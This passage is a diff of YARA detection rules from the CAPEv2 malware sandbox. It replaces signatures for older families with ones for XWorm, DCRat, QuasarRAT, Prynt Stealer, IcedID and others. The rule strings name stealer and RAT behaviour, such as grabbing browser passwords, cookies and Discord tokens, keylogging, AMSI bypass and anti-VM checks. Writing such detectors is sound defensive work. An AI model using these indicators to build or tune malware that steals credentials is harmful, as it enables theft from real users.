+		$s2 = "Downloading file: \"{file}\"" wide
+		$s3 = "/bot{0}/getUpdates?offset={1}" wide
+		$s4 = "send command to bot!" wide
+		$s5 = " *Keylogger " fullword wide
+		$s6 = "*Stealer" wide
+		$s7 = "Bot connected" wide
 
 	condition:
-		uint16( 0 ) == 0x5A4D and any of them
+		uint16( 0 ) == 0x5a4d and 1 of ( $c* ) and ( 1 of ( $x* ) or 2 of ( $m* ) or 3 of ( $s* ) )
 }
-rule CAPE_Petrwrap : FILE
+rule CAPE_Prynt : FILE
 {
 	meta:
-		description = "PetrWrap Payload"
-		author = "kevoreilly"
-		id = "83762c87-6e96-50fe-b297-e1a5f893be43"
-		date = "2019-10-30"
-		modified = "2022-06-09"
+		description = "Detects Prynt infostealer"
+		author = "ditekSHen"
+		id = "844fd100-b04e-5ff0-9fab-d45f48b55bcc"
+		date = "2024-10-09"
+		modified = "2025-02-03"
 		reference = "https://github.com/kevoreilly/CAPEv2"
-		source_url = "https://github.com/kevoreilly/CAPEv2/blob/7ace95378cd09c8e26138125761b13750dfc6cb4/data/yara/CAPE/PetrWrap.yar#L1-L15"
-		license_url = "https://github.com/kevoreilly/CAPEv2/blob/7ace95378cd09c8e26138125761b13750dfc6cb4/LICENSE"
-		logic_hash = "6dd1cf5639b63d0ab41b24080dad68d285f2e3969ad34fd724c83e7a0dd4b968"
+		source_url = "https://github.com/kevoreilly/CAPEv2/blob/a9a0887dab232f52c59e955b9984dd494c47ce6b/data/yara/CAPE/AsyncRAT.yar#L85-L107"
+		license_url = "https://github.com/kevoreilly/CAPEv2/blob/a9a0887dab232f52c59e955b9984dd494c47ce6b/LICENSE"
+		logic_hash = "84f2b33285ab1d129a62940a02990639cc8f7c92d490d7257e6aed9170d1e34e"
 		score = 75
 		quality = 70
 		tags = "FILE"
-		cape_type = "PetrWrap Payload"
+		cape_type = "Prynt Payload"
 
 	strings:
-		$a1 = "http://petya3jxfp2f7g3i.onion/"
-		$a2 = "http://petya3sen7dyko2n.onion"
-		$b1 = "http://mischapuk6hyrn72.onion/"
-		$b2 = "http://mischa5xyix2mrhd.onion/"
+		$c1 = /Prynt(\s)?Stealer/ ascii wide
+		$x2 = "@FlatLineStealer" ascii wide
+		$x3 = "@CashOutGangTalk" ascii wide
+		$m1 = ".Passwords.Targets." ascii
+		$m2 = ".Modules.Keylogger" ascii
+		$m3 = ".Modules.Clipper" ascii
+		$m4 = ".Modules.Implant" ascii
+		$s1 = "--- Clipper" wide
+		$s2 = "Downloading file: \"{file}\"" wide
+		$s3 = "/bot{0}/getUpdates?offset={1}" wide
+		$s4 = "send command to bot!" wide
+		$s5 = " *Keylogger " fullword wide
+		$s6 = "*Stealer" wide
+		$s7 = "Bot connected" wide
 
 	condition:
-		uint16( 0 ) == 0x5A4D and ( any of ( $a* ) ) and ( any of ( $b* ) )
+		uint16( 0 ) == 0x5a4d and 1 of ( $c* ) and ( 1 of ( $x* ) or 2 of ( $m* ) or 3 of ( $s* ) )
 }
-rule CAPE_Zerot : FILE
+rule CAPE_Xworm_1 : FILE
 {
 	meta:
-		description = "ZeroT Payload"
-		author = "kevoreilly"
-		id = "dc5dc18c-2ec6-541d-905c-42543f17b16d"
-		date = "2019-10-30"
-		modified = "2019-10-30"
+		description = "Detects XWorm"
+		author = "ditekSHen"
+		id = "bf9115a7-850a-5326-860c-a9a71bc7e50c"
+		date = "2024-10-09"
+		modified = "2025-02-03"
 		reference = "https://github.com/kevoreilly/CAPEv2"
-		source_url = "https://github.com/kevoreilly/CAPEv2/blob/7ace95378cd09c8e26138125761b13750dfc6cb4/data/yara/CAPE/ZeroT.yar#L1-L15"
-		license_url = "https://github.com/kevoreilly/CAPEv2/blob/7ace95378cd09c8e26138125761b13750dfc6cb4/LICENSE"
-		logic_hash = "f60ae25ac3cd741b8bdc5100b5d3c474b5d9fbe8be88bfd184994bae106c3803"
+		source_url = "https://github.com/kevoreilly/CAPEv2/blob/a9a0887dab232f52c59e955b9984dd494c47ce6b/data/yara/CAPE/AsyncRAT.yar#L110-L136"
+		license_url = "https://github.com/kevoreilly/CAPEv2/blob/a9a0887dab232f52c59e955b9984dd494c47ce6b/LICENSE"
+		logic_hash = "5a86c2f0a188135e53d86c176806a208abbe3dd830bde364016859ffa5294bd7"
 		score = 75
 		quality = 68
 		tags = "FILE"
-		cape_type = "ZeroT Payload"
+		cape_type = "XWorm Payload"
 
 	strings:
-		$decrypt = {8B C1 8D B5 FC FE FF FF 33 D2 03 F1 F7 75 10 88 0C 33 41 8A 04 3A 88 06 81 F9 00 01 00 00 7C E0}
-		$string1 = "(*^GF(9042&*"
-		$string2 = "s2-18rg1-41g3j_.;"
-		$string3 = "GET" wide
-		$string4 = "open"
+		$x1 = "XWorm " wide nocase
+		$x2 = /XWorm\s(V|v)\d+\.\d+/ fullword wide
+		$s1 = "RunBotKiller" fullword wide
+		$s2 = "XKlog.txt" fullword wide
+		$s3 = /(shell|reg)fuc/ fullword wide
+		$s4 = "closeshell" fullword ascii
+		$s5 = { 62 00 79 00 70 00 73 00 73 00 00 ?? 63 00 61 00 6c 00 6c 00 75 00 61 00 63 00 00 ?? 73 00 63 00 }
+		$s6 = { 44 00 44 00 6f 00 73 00 54 00 00 ?? 43 00 69 00 6c 00 70 00 70 00 65 00 72 00 00 ?? 50 00 45 00 }
+		$s7 = { 69 00 6e 00 6a 00 52 00 75 00 6e 00 00 ?? 73 00 74 00 61 00 72 00 74 00 75 00 73 00 62 }
+		$s8 = { 48 6f 73 74 00 50 6f 72 74 00 75 70 6c 6f 61 64 65 72 00 6e 61 6d 65 65 65 00 4b 45 59 00 53 50 4c 00 4d 75 74 65 78 78 00 }
+		$v2_1 = "PING!" fullword wide
+		$v2_2 = "Urlhide" fullword wide
+		$v2_3 = /PC(Restart|Shutdown)/ fullword wide
+		$v2_4 = /(Start|Stop)(DDos|Report)/ fullword wide
+		$v2_5 = /Offline(Get|Keylogger)/ wide
+		$v2_6 = "injRun" fullword wide
+		$v2_7 = "Xchat" fullword wide
+		$v2_8 = "UACFunc" fullword ascii wide
 
 	condition:
-		uint16( 0 ) == 0x5A4D and all of them
+		uint16( 0 ) == 0x5a4d and ( ( 1 of ( $x* ) and ( 3 of ( $s* ) or 3 of ( $v2* ) ) ) or 6 of them )
 }
-rule CAPE_Bazar : FILE
+rule CAPE_Xworm_Kingrat
 {
 	meta:
 		description = "No description has been set in the source file - CAPE"
-		author = "kevoreilly"
-		id = "e042f180-2a82-5c93-9858-77281557dd10"
-		date = "2021-08-26"
-		modified = "2022-06-09"
+		author = "jeFF0Falltrades"
+		id = "76332a42-97c9-52fe-83dc-04ceb367f692"
+		date = "2024-10-09"
+		modified = "2025-02-03"
 		reference = "https://github.com/kevoreilly/CAPEv2"
-		source_url = "https://github.com/kevoreilly/CAPEv2/blob/7ace95378cd09c8e26138125761b13750dfc6cb4/data/yara/CAPE/Bazar.yar#L1-L11"
-		license_url = "https://github.com/kevoreilly/CAPEv2/blob/7ace95378cd09c8e26138125761b13750dfc6cb4/LICENSE"
-		logic_hash = "9375f59b56e47fd0b90b089afdf3be8f16f960038fc625523a2e2d5509ab099d"
+		source_url = "https://github.com/kevoreilly/CAPEv2/blob/a9a0887dab232f52c59e955b9984dd494c47ce6b/data/yara/CAPE/AsyncRAT.yar#L138-L155"
+		license_url = "https://github.com/kevoreilly/CAPEv2/blob/a9a0887dab232f52c59e955b9984dd494c47ce6b/LICENSE"
+		logic_hash = "3914be652bb7271e5e6b89d05edf10a54f8ddaf9e22d194b60501aa2cdd495d3"
 		score = 75
-		quality = 70
-		tags = "FILE"
-		cape_type = "Bazar Payload"
+		quality = 66
+		tags = ""
+		cape_type = "XWorm payload"
 
 	strings:
-		$decode = {F7 E9 [0-2] C1 FA 0? 8B C2 C1 E8 1F 03 D0 6B C2 ?? 2B C8}
-		$rsa = {C7 00 52 53 41 33 48 8D 48 09 C7 40 04 00 08 00 00 4C 8D 05 [3] 00 C6 40 08 03 B8 09 00 00 00 [0-3] 48 8D 89 80 00 00 00 41 0F 10 00}
+		$str_xworm = "xworm" wide ascii nocase
+		$str_xwormmm = "Xwormmm" wide ascii
+		$str_xclient = "XClient" wide ascii
+		$str_default_log = "\\Log.tmp" wide ascii
+		$str_create_proc = "/create /f /RL HIGHEST /sc minute /mo 1 /t" wide ascii
+		$str_ddos_start = "StartDDos" wide ascii
+		$str_ddos_stop = "StopDDos" wide ascii
+		$str_timeout = "timeout 3 > NUL" wide ascii
+		$byte_md5_hash = { 7e [3] 04 28 [3] 06 6f }
+		$patt_config = { 72 [3] 70 80 [3] 04 }
 
 	condition:
-		uint16( 0 ) == 0x5A4D and 2 of them
+		5 of them and #patt_config >= 7
 }
-rule CAPE_Fareit : FILE
+rule CAPE_Dcrat : FILE
 {
 	meta:
-		description = "Fareit Payload"
-		author = "kevoreilly"
-		id = "b3c4eb86-d104-5f31-afa4-5bf5f370f64e"
-		date = "2019-10-30"
-		modified = "2022-06-09"
+		description = "DCRat payload"
+		author = "ditekSHen"
+		id = "16c81fe0-2c18-55e9-aa17-cfd4213d6a17"
+		date = "2024-10-09"
+		modified = "2025-02-03"
 		reference = "https://github.com/kevoreilly/CAPEv2"
-		source_url = "https://github.com/kevoreilly/CAPEv2/blob/7ace95378cd09c8e26138125761b13750dfc6cb4/data/yara/CAPE/Fareit.yar#L1-L11"
-		license_url = "https://github.com/kevoreilly/CAPEv2/blob/7ace95378cd09c8e26138125761b13750dfc6cb4/LICENSE"
-		logic_hash = "ed35391ffc949219f380da3f22bc8397a7d5c742bd68e227c3becdebcab5cf83"
+		source_url = "https://github.com/kevoreilly/CAPEv2/blob/a9a0887dab232f52c59e955b9984dd494c47ce6b/data/yara/CAPE/AsyncRAT.yar#L157-L222"
+		license_url = "https://github.com/kevoreilly/CAPEv2/blob/a9a0887dab232f52c59e955b9984dd494c47ce6b/LICENSE"
+		logic_hash = "5a02dcc2b9c7eb3efdba39047e37886240b45fb7e2db3b82aa5b4b9526dfb7f8"
 		score = 75
-		quality = 70
+		quality = 45
 		tags = "FILE"
-		cape_type = "Fareit Payload"
+		cape_type = "DCRat Payload"
 
 	strings:
-		$string1 = {0D 0A 09 09 0D 0A 0D 0A 09 20 20 20 3A 6B 74 6B 20 20 20 0D 0A 0D 0A 0D 0A 20 20 20 20 20 64 65 6C 20 20 20 20 09 20 25 31 20 20 0D 0A 09 69 66 20 20 09 09 20 65 78 69 73 74 20 09 20 20 20 25 31 20 20 09 20 20 67 6F 74 6F 20 09 0D 20 6B 74 6B 0D 0A 20 64 65 6C 20 09 20 20 25 30 20 00}
+		$dc1 = "DCRatBuild" ascii
+		$dc2 = "DCStlr" ascii
+		$x1 = "px\"><center>DCRat Keylogger" wide
+		$x2 = "DCRat-Log#" wide
+		$x3 = "DCRat.Code" wide
+		$string1 = "CaptureBrowsers" fullword ascii
+		$string2 = "DecryptBrowsers" fullword ascii
+		$string3 = "Browsers.IE10" ascii
+		$string4 = "Browsers.Chromium" ascii
+		$string5 = "WshShell" ascii
+		$string6 = "SysMngmts" fullword ascii
+		$string7 = "LoggerData" fullword ascii
+		$plugin = "DCRatPlugin" fullword ascii
+		$av1 = "AntiVM" ascii wide
+		$av2 = "vmware" fullword wide
+		$av3 = "VirtualBox" fullword wide
+		$av4 = "microsoft corporation" fullword wide
+		$av5 = "VIRTUAL" fullword wide
+		$av6 = "DetectVirtualMachine" fullword ascii
+		$av7 = "Select * from Win32_ComputerSystem" fullword wide
+		$pl1 = "dcratAPI" fullword ascii
+		$pl2 = "dsockapi" fullword ascii
+		$pl3 = "file_get_contents" fullword ascii
+		$pl4 = "classthis" fullword ascii
+		$pl5 = "typemdt" fullword ascii
+		$pl6 = "Plugin_AutoStealer" ascii wide
+		$pl7 = "Plugin_AutoKeylogger" ascii wide
+		$v1 = "Plugin couldn't process this action!" wide
+		$v2 = "Unknown command!" wide
+		$v3 = "PLUGINCONFIGS" wide
+		$v4 = "Saving log..." wide
+		$v5 = "~Work.log" wide
+		$v6 = "MicrophoneNum" fullword wide
+		$v7 = "WebcamNum" fullword wide
+		$v8 = "%SystemDrive% - Slow" wide
+		$v9 = "%UsersFolder% - Fast" wide
+		$v10 = "%AppData% - Very Fast" wide
+		$v11 = /<span style=\"color: #F85C50;\">\[(Up|Down|Enter|ESC|CTRL|Shift|Win|Tab|CAPSLOCK: (ON|OFF))\]<\/span>/ wide
+		$px1 = "[Browsers] Scanned elements: " wide
+		$px2 = "[Browsers] Grabbing cookies" wide
+		$px3 = "[Browsers] Grabbing passwords" wide
+		$px4 = "[Browsers] Grabbing forms" wide
+		$px5 = "[Browsers] Grabbing CC" wide
+		$px6 = "[Browsers] Grabbing history" wide
+		$px7 = "[StealerPlugin] Invoke: " wide
+		$px8 = "[Other] Grabbing steam" wide
+		$px9 = "[Other] Grabbing telegram" wide
+		$px10 = "[Other] Grabbing discord tokens" wide
+		$px11 = "[Other] Grabbing filezilla" wide
+		$px12 = "[Other] Screenshots:" wide
+		$px13 = "[Other] Clipboard" wide
+		$px14 = "[Other] Saving system information" wide
 
 	condition:
-		uint16( 0 ) == 0x5A4D and any of ( $string* )
+		uint16( 0 ) == 0x5a4d and ( all of ( $dc* ) or all of ( $string* ) or 2 of ( $x* ) or 6 of ( $v* ) or 5 of ( $px* ) ) or ( $plugin and ( 4 of ( $av* ) or 5 of ( $pl* ) ) )
 }
-rule CAPE_Mole : FILE
+rule CAPE_Dcrat_Kingrat
 {
 	meta:
-		description = "Mole Payload"
-		author = "kevoreilly"
-		id = "1185170f-4a5b-5347-807b-ef2af98a1a09"
-		date = "2019-10-30"
-		modified = "2019-10-30"
+		description = "No description has been set in the source file - CAPE"
+		author = "jeFF0Falltrades"
+		id = "9b63e361-6678-5c95-be32-777feecd194b"
+		date = "2024-10-09"
+		modified = "2025-02-03"
 		reference = "https://github.com/kevoreilly/CAPEv2"
-		source_url = "https://github.com/kevoreilly/CAPEv2/blob/7ace95378cd09c8e26138125761b13750dfc6cb4/data/yara/CAPE/Mole.yar#L1-L13"
-		license_url = "https://github.com/kevoreilly/CAPEv2/blob/7ace95378cd09c8e26138125761b13750dfc6cb4/LICENSE"
-		logic_hash = "8be4d190d554a610360c0e04b33da59eb00319395e5b2000d580546ce6503786"
+		source_url = "https://github.com/kevoreilly/CAPEv2/blob/a9a0887dab232f52c59e955b9984dd494c47ce6b/data/yara/CAPE/AsyncRAT.yar#L224-L243"
+		license_url = "https://github.com/kevoreilly/CAPEv2/blob/a9a0887dab232f52c59e955b9984dd494c47ce6b/LICENSE"
+		logic_hash = "73ac27c3f0fc71d053e89690b5a7d29c1f8b0ea0a22e8595148a9001799fae54"
+		score = 75
+		quality = 62
+		tags = ""
+		cape_type = "DCRat Payload"
+
+	strings:
+		$venom_1 = "VenomRAT" wide ascii nocase
+		$venom_2 = "HVNC_REPLY_MESSAGE" wide ascii
+		$str_aes_exc = "masterKey can not be null or empty" wide ascii
+		$str_b64_amsi = "YW1zaS5kbGw=" wide ascii
+		$str_b64_virtual_protect = "VmlydHVhbFByb3RlY3Q=" wide ascii
+		$str_dcrat = "dcrat" wide ascii nocase
+		$str_plugin = "save_Plugin" wide ascii
+		$str_qwqdan = "qwqdan" wide ascii
+		$byte_aes_key_base = { 7E [3] 04 73 [3] 06 80 }
+		$patt_config = { 72 [3] 70 80 [3] 04 }
+		$patt_verify_hash = { 7e [3] 04 6f [3] 0a 6f [3] 0a 74 [3] 01 }
+
+	condition:
+		( not any of ( $venom* ) ) and 5 of them and #patt_config >= 10
+}
+rule CAPE_Quasarrat : FILE
+{
+	meta:
+		description = "QuasarRAT payload"
+		author = "ditekshen"
+		id = "f256b88f-eee6-5f8c-afd6-32ed10ea908d"
+		date = "2024-10-09"
+		modified = "2025-02-03"
+		reference = "https://github.com/kevoreilly/CAPEv2"
+		source_url = "https://github.com/kevoreilly/CAPEv2/blob/a9a0887dab232f52c59e955b9984dd494c47ce6b/data/yara/CAPE/AsyncRAT.yar#L245-L266"
+		license_url = "https://github.com/kevoreilly/CAPEv2/blob/a9a0887dab232f52c59e955b9984dd494c47ce6b/LICENSE"
+		logic_hash = "556b19dc0980761198ea31a285f281adae084463d24bff1eda15326436ad562b"
 		score = 75
 		quality = 70
 		tags = "FILE"
-		cape_type = "Mole Payload"
+		cape_type = "QuasarRAT Payload"
 
 	strings:
-		$a1 = ".mole0" wide
-		$a2 = "_HELP_INSTRUCTION.TXT" wide
-		$a3 = "-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQ"
+		$s1 = "GetKeyloggerLogsResponse" fullword ascii
+		$s2 = "GetKeyloggerLogs" fullword ascii
+		$s3 = "/>Log created on" wide
+		$s4 = "User: {0}{3}Pass: {1}{3}Host: {2}" wide
+		$s5 = "Domain: {1}{0}Cookie Name: {2}{0}Value: {3}{0}Path: {4}{0}Expired: {5}{0}HttpOnly: {6}{0}Secure: {7}" wide
+		$s6 = "grabber_" wide
+		$s7 = "<virtualKeyCode>" ascii
+		$s8 = "<RunHidden>k__BackingField" fullword ascii
+		$s9 = "<keyboardHookStruct>" ascii
+		$s10 = "add_OnHotKeysDown" ascii
+		$mutex = "QSR_MUTEX_" ascii wide
+		$ua1 = "Mozilla/5.0 (Windows NT 6.3; rv:48.0) Gecko/20100101 Firefox/48.0" fullword wide
+		$us2 = "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.75.14 (KHTML, like Gecko) Version/7.0.3 Safari/7046A194A" fullword wide
 
 	condition:
-		uint16( 0 ) == 0x5A4D and ( all of ( $a* ) )
+		uint16( 0 ) == 0x5a4d and ( $mutex or ( all of ( $ua* ) and 2 of them ) or 6 of ( $s* ) )
 }
-rule CAPE_Chaosbot : FILE
+rule CAPE_Quasarrat_Kingrat
 {
 	meta:
 		description = "No description has been set in the source file - CAPE"
-		author = "YungBinary"
-		id = "3c8ce71c-2a92-5ca9-9b33-c7059d47f4ca"
-		date = "2025-10-16"
-		modified = "2025-10-16"
-		reference = "https://x.com/YungBinary/status/1976580501508182269"
-		source_url = "https://github.com/kevoreilly/CAPEv2/blob/7ace95378cd09c8e26138125761b13750dfc6cb4/data/yara/CAPE/ChaosBot.yar#L1-L24"
-		license_url = "https://github.com/kevoreilly/CAPEv2/blob/7ace95378cd09c8e26138125761b13750dfc6cb4/LICENSE"
-		logic_hash = "fcb04697dbef62497421318d5dfe7cdf5533b432975ebbfb3bd64ebbfeb4a592"
+		author = "jeFF0Falltrades"
+		id = "dc0139e1-9f69-51da-b28f-212358b2f68b"
+		date = "2024-10-09"
+		modified = "2025-02-03"
+		reference = "https://github.com/kevoreilly/CAPEv2"
+		source_url = "https://github.com/kevoreilly/CAPEv2/blob/a9a0887dab232f52c59e955b9984dd494c47ce6b/data/yara/CAPE/AsyncRAT.yar#L268-L287"
+		license_url = "https://github.com/kevoreilly/CAPEv2/blob/a9a0887dab232f52c59e955b9984dd494c47ce6b/LICENSE"
+		logic_hash = "1f4296a592134edbe52e256dc353143af02e897ff1afad98f3dac0c5ab13f3f7"
 		score = 75
-		quality = 62
-		tags = "FILE"
-		cape_type = "ChaosBot Payload"
+		quality = 70
+		tags = ""
+		cape_type = "QuasarRAT Payload"
 
 	strings:
-		$s1 = { 48 6f 73 74 20 20 63 6f 6e 6e 65 63 74 65 64 2c 20 63 68 61 6e 6e 65 6c 20 63 72 65 61 74 65 64 3a 20 3c }
-		$s2 = { 73 68 65 6c 6c 20 64 6f 77 6e 6c 6f 61 64 20 63 64 20 46 61 69 6c 65 64 20 74 6f 20 63 68 61 6e 67 65 20 64 69 72 65 63 74 6f 72 79 3a }
-		$s3 = { 56 69 72 74 75 61 6c 50 72 6f 74 65 63 74 41 6d 73 69 53 63 61 6e 42 75 66 66 65 72 45 74 77 45 76 65 6e 74 57 72 69 74 65 43 4f 4d 50 55 54 45 52 4e 41 4d 45 }
-		$s4 = { 43 3a 5c 55 73 65 72 73 5c 50 75 62 6c 69 63 5c 6d 65 73 73 61 67 65 5f 2e 74 78 74 }
-		$bypass = {
-            74 ??
-            66 C7 03 31 C0
-            C6 43 02 C3
-        }
-		$antivm = {
-            48 ?? 30 30 3A 30 43 3A 32 39
-            49 39 ?? 00
-        }
+		$str_quasar = "Quasar." wide ascii
+		$str_hidden = "set_Hidden" wide ascii
+		$str_shell = "DoShellExecuteResponse" wide ascii
+		$str_close = "echo DONT CLOSE THIS WINDOW!" wide ascii
+		$str_pause = "ping -n 10 localhost > nul" wide ascii
+		$str_aes_exc = "masterKey can not be null or empty" wide ascii
+		$byte_aes_key_base = { 7E [3] 04 73 [3] 06 25 }
+		$byte_aes_salt_base = { BF EB 1E 56 FB CD 97 3B B2 19 }
+		$byte_special_folder = { 7e 73 [4] 28 [4] 80 }
+		$patt_config = { 72 [3] 70 80 [3] 04 }
+		$patt_verify_hash = { 7e [3] 04 6f [3] 0a 6f [3] 0a 74 [3] 01 }
 
 	condition:
-		uint16( 0 ) == 0x5a4d and ( 1 of ( $s* ) or ( $antivm and $bypass ) )
+		6 of them and #patt_config >= 10
 }
 rule CAPE_Nemty : FILE
 {
@@ -66340,8 +66344,8 @@ rule CAPE_Nemty : FILE
 		date = "2020-04-03"
 		modified = "2020-04-03"
 		reference = "https://github.com/kevoreilly/CAPEv2"
-		source_url = "https://github.com/kevoreilly/CAPEv2/blob/7ace95378cd09c8e26138125761b13750dfc6cb4/data/yara/CAPE/Nemty.yar#L1-L13"
-		license_url = "https://github.com/kevoreilly/CAPEv2/blob/7ace95378cd09c8e26138125761b13750dfc6cb4/LICENSE"
+		source_url = "https://github.com/kevoreilly/CAPEv2/blob/a9a0887dab232f52c59e955b9984dd494c47ce6b/data/yara/CAPE/Nemty.yar#L1-L13"
+		license_url = "https://github.com/kevoreilly/CAPEv2/blob/a9a0887dab232f52c59e955b9984dd494c47ce6b/LICENSE"
 		logic_hash = "a05974b561c67b4f1e0812639b74831edcf65686a06c0d380f0b45739e342419"
 		score = 75
 		quality = 70
@@ -66356,495 +66360,491 @@ rule CAPE_Nemty : FILE
 	condition:
 		uint16( 0 ) == 0x5A4D and all of them
 }
-rule CAPE_Monsterv2 : FILE
+rule CAPE_Bitpaymer : FILE
 {
 	meta:
-		description = "MonsterV2 Payload"
-		author = "doomedraven,YungBinary"
-		id = "4bc3546f-34ad-579e-9822-272a2b3c74e2"
-		date = "2025-09-06"
-		modified = "2025-09-12"
+		description = "BitPaymer Payload"
+		author = "kevoreilly"
+		id = "c139b514-a1ba-5d47-8f4d-8e60cddfe2ba"
+		date = "2019-11-27"
+		modified = "2019-11-27"
 		reference = "https://github.com/kevoreilly/CAPEv2"
-		source_url = "https://github.com/kevoreilly/CAPEv2/blob/7ace95378cd09c8e26138125761b13750dfc6cb4/data/yara/CAPE/MonsterV2.yar#L1-L21"
-		license_url = "https://github.com/kevoreilly/CAPEv2/blob/7ace95378cd09c8e26138125761b13750dfc6cb4/LICENSE"
-		logic_hash = "d4e65f860e69b2eee8a818a4146d91b84ce6da30c8fa27593587932e4f0847a8"
+		source_url = "https://github.com/kevoreilly/CAPEv2/blob/a9a0887dab232f52c59e955b9984dd494c47ce6b/data/yara/CAPE/BitPaymer.yar#L1-L13"
+		license_url = "https://github.com/kevoreilly/CAPEv2/blob/a9a0887dab232f52c59e955b9984dd494c47ce6b/LICENSE"
+		logic_hash = "6ae0dc9a36da13e483d8d653276b06f59ecc15c95c754c268dcc91b181677c4c"
 		score = 75
 		quality = 70
 		tags = "FILE"
-		cape_type = "MonsterV2 Payload"
-		packed = "fe69e8db634319815270aa0e55fe4b9c62ce8e62484609c3a42904fbe5bb2ab3"
+		cape_type = "BitPaymer Payload"
 
 	strings:
-		$decrypt_config = {
-            41 B8 0E 04 00 00
-            48 8D 15 ?? ?? ?? 00
-            48 8B C?
-            E8 ?? ?? ?? ?? [3-17]
-            4C 8B C?
-            48 8D 54 24 28
-            48 8B CE
-            E8 ?? ?? ?? ??
-        }
+		$decrypt32 = {6A 40 58 3B C8 0F 4D C1 39 46 04 7D 50 53 57 8B F8 81 E7 3F 00 00 80 79 05 4F 83 CF C0 47 F7 DF 99 1B FF 83 E2 3F 03 C2 F7 DF C1 F8 06 03 F8 C1 E7 06 57}
+		$antidefender = "TouchMeNot" wide
 
 	condition:
-		uint16( 0 ) == 0x5A4D and $decrypt_config
+		uint16( 0 ) == 0x5A4D and all of them
 }
-rule CAPE_Lokibot : FILE
+rule CAPE_Rcsession
 {
 	meta:
-		description = "LokiBot Payload"
+		description = "RCSession Payload"
 		author = "kevoreilly"
-		id = "8cdf69e2-ecac-5241-adba-c458cce0610f"
-		date = "2022-02-01"
-		modified = "2022-02-01"
+		id = "841e6bd1-4f09-54dc-8dec-2e9423a34003"
+		date = "2019-10-30"
+		modified = "2019-10-30"
 		reference = "https://github.com/kevoreilly/CAPEv2"
-		source_url = "https://github.com/kevoreilly/CAPEv2/blob/7ace95378cd09c8e26138125761b13750dfc6cb4/data/yara/CAPE/LokiBot.yar#L1-L12"
-		license_url = "https://github.com/kevoreilly/CAPEv2/blob/7ace95378cd09c8e26138125761b13750dfc6cb4/LICENSE"
-		logic_hash = "a5b3d518371138740e913d2d6ce4fa22d3da5cea7e034c7d6b4b502e6bf44b06"
+		source_url = "https://github.com/kevoreilly/CAPEv2/blob/a9a0887dab232f52c59e955b9984dd494c47ce6b/data/yara/CAPE/RCSession.yar#L1-L12"
+		license_url = "https://github.com/kevoreilly/CAPEv2/blob/a9a0887dab232f52c59e955b9984dd494c47ce6b/LICENSE"
+		logic_hash = "ebd1e9e615a91c35b36332cad55519607323469df738cec4464288b45787630d"
 		score = 75
 		quality = 70
-		tags = "FILE"
-		cape_type = "LokiBot Payload"
+		tags = ""
+		cape_type = "RCSession Payload"
 
 	strings:
-		$a1 = "DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW"
-		$a2 = "last_compatible_version"
+		$a1 = {56 33 F6 39 74 24 08 7E 4C 53 57 8B F8 2B FA 8B C6 25 03 00 00 80 79 05 48 83 C8 FC 40 83 E8 00 74 19 48 74 0F 48 74 05 6B C9 09 EB 15 8B C1 C1 E8 02 EB 03 8D 04 09 2B C8}
+		$a2 = {83 C4 10 85 C0 74 ?? BE ?? ?? ?? ?? 89 74 24 10 E8 ?? ?? ?? ?? 6A 03 68 48 0B 00 00 56 53 57 68 02 00 00 80 E8 ?? ?? ?? ?? 83 C4 18 85 C0 74 18 E8 ?? ?? ?? ?? 6A 03 68 48}
 
 	condition:
-		uint16( 0 ) == 0x5A4D and ( all of ( $a* ) )
+		( any of ( $a* ) )
 }
-rule CAPE_Bruteratel
+rule CAPE_Icedid
 {
 	meta:
-		description = "BruteRatel Payload"
-		author = "kevoreilly"
-		id = "61b951e4-0c27-59c0-8ea2-715b673fdcee"
-		date = "2024-07-11"
-		modified = "2024-07-11"
+		description = "IcedID Payload"
+		author = "kevoreilly, threathive"
+		id = "439342be-a1e6-5656-8813-5cebb0e88e98"
+		date = "2019-10-30"
+		modified = "2021-12-16"
 		reference = "https://github.com/kevoreilly/CAPEv2"
-		source_url = "https://github.com/kevoreilly/CAPEv2/blob/7ace95378cd09c8e26138125761b13750dfc6cb4/data/yara/CAPE/BruteRatel.yar#L1-L14"
-		license_url = "https://github.com/kevoreilly/CAPEv2/blob/7ace95378cd09c8e26138125761b13750dfc6cb4/LICENSE"
-		logic_hash = "0984977c716d6f8e068c045166eb5db77c9fbce27513e555dceca348375f1a66"
+		source_url = "https://github.com/kevoreilly/CAPEv2/blob/a9a0887dab232f52c59e955b9984dd494c47ce6b/data/yara/CAPE/IcedID.yar#L1-L18"
+		license_url = "https://github.com/kevoreilly/CAPEv2/blob/a9a0887dab232f52c59e955b9984dd494c47ce6b/LICENSE"
+		logic_hash = "e60ccbab7a360020744eba65961156ca3e2ae9cf23671014f913d71c1a96a331"
 		score = 75
-		quality = 70
+		quality = 45
 		tags = ""
-		cape_type = "BruteRatel Payload"
+		cape_type = "IcedID Payload"
 
 	strings:
-		$syscall1 = {49 89 CA 4? 89 ?? (41 FF|FF)}
-		$syscall2 = {49 89 CA 48 8B 44 24 ?? FF 64 24}
-		$jmpapi = {49 89 ?? 10 49 C7 45 08 ?? 00 00 00 E8 00 00 00 00 ?? (48|49) 83 [2] 41 FF E2}
-		$decode = {89 C2 8A 14 17 40 38 EA 75 06 FF C0 89 03 EB 0B 41 88 14 08 48 FF C1 FF 03 EB}
+		$crypt1 = {8A 04 ?? D1 C? F7 D? D1 C? 81 E? 20 01 00 00 D1 C? F7 D? 81 E? 01 91 00 00 32 C? 88}
+		$crypt2 = {8B 44 24 04 D1 C8 F7 D0 D1 C8 2D 20 01 00 00 D1 C0 F7 D0 2D 01 91 00 00 C3}
+		$crypt3 = {41 00 8B C8 C1 E1 08 0F B6 C4 66 33 C8 66 89 4? 24 A1 ?? ?? 41 00 89 4? 20 A0 ?? ?? 41 00 D0 E8 32 4? 32}
+		$download1 = {8D 44 24 40 50 8D 84 24 44 03 00 00 68 04 21 40 00 50 FF D5 8D 84 24 4C 01 00 00 C7 44 24 28 01 00 00 00 89 44 24 1C 8D 4C 24 1C 8D 84 24 4C 03 00 00 83 C4 0C 89 44 24 14 8B D3 B8 BB 01 00 00 66 89 44 24 18 57}
+		$download2 = {8B 75 ?? 8D 4D ?? 8B 7D ?? 8B D6 57 89 1E 89 1F E8 [4] 59 3D C8 00 00 00 75 05 33 C0 40 EB}
